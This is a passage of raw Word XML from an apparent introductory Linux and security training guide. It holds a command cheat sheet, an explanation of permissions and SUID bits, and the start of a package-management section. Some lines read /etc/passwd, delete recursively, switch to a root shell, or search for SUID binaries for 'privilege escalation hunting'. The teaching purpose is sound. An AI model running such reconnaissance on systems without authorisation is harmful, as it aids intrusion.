        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cp file.txt /tmp/backup.txt  # Copy file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mv file.txt renamed.txt      # Move/rename file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rm -rf /tmp/oldstuff         # Remove recursively (be careful!)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name '*.conf' 2&gt;/dev/null  # Find all .conf files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd              # Display file contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">grep 'root' /etc/passwd      # Search for pattern in file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Permissions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 755 script.sh          # rwxr-xr-x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x script.sh           # Make executable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chown root:root file.txt     # Change ownership</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo command                 # Run as superuser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su                      # Switch to root shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Networking:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ip addr show                 # Show network interfaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route show                # Show routing table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ping 8.8.8.8                 # Test connectivity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -tulnp               # Show listening ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp                    # Modern netstat replacement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I https://example.com  # HTTP headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">wget https://example.com/file.zip  # Download file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Management:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux                       # List all processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">top / htop                   # Interactive process monitor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">kill -9 PID                  # Force kill process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs                         # List background jobs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">command &amp;                    # Run command in background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Linux Permissions Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux permissions are critical to both understanding vulnerabilities and locking down systems:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">File permission format: rwxrwxrwx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                       ^^^ ^^^ ^^^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |   |   +-- Others (world)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |   +------ Group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                       +---------- Owner (user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">r = read (4)    w = write (2)    x = execute (1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 755 = 4+2+1 | 4+0+1 | 4+0+1 = rwxr-xr-x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 644 = 4+2+0 | 4+0+0 | 4+0+0 = rw-r--r--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Special permissions to know:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID (Set User ID): When set on an executable, it runs as the file owner, not the caller. A SUID root binary = instant privilege escalation vector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SGID (Set Group ID): Similar to SUID but for group permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sticky bit: On directories, only the file owner can delete their own files (e.g., /tmp).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Find SUID binaries (privilege escalation hunting):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 Package Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux distributions use package managers to install software. Key ones you'll use:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Debian/Ubuntu/Kali/Parrot (apt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update              # Refresh package lists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
